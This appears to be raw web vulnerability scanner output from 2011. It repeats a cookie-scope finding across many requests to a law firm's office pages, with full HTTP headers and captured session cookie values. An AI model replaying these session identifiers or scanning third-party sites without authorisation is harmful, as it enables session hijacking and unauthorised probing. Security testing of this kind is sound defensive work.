The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /zh-CN/practice/region.aspx HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fError.html%3faspxerrorpath%3d%2fFCWSite%2fFeatures%2fServices%2fregion.aspx">here</a>.</h2> </body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Austin HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:53:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A53%3A25%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1830%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:53:25 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Beijing HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:53:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A53%3A47%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1944%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:53:47 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Dallas HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:53:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A53%3A49%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1950%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:53:49 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Denver HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:53:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A53%3A54%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1974%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:53:54 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /FAA_adv HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:50:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A50%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D888%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:50:17 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /HongKong HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A25%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2092%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:54:25 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /London HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A28%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2108%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:28 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /LosAngeles HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A45%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2193%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:45 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Minneapolis HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A54%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2239%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:54 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Munich HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:55:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A55%3A14%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2338%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:55:14 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Riyadh HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:56:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A56%3A29%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2679%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:56:29 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /SanAntonio HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:56:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A56%3A53%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2763%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:56:53 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /StLouis HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:57:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A57%3A04%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2807%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:57:04 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /aboutus HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A57%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D190%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:57 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /alumni HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A23%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D435%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:23 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /aop HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:50:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A50%3A28%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D934%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:50:28 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /careers HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Wed, 19 Jan 2011 15:49:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A07%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D268%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:07 GMT;path=/ location: http://www.joinfulbright.com Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dc/x22 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A35%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D5%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/ Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
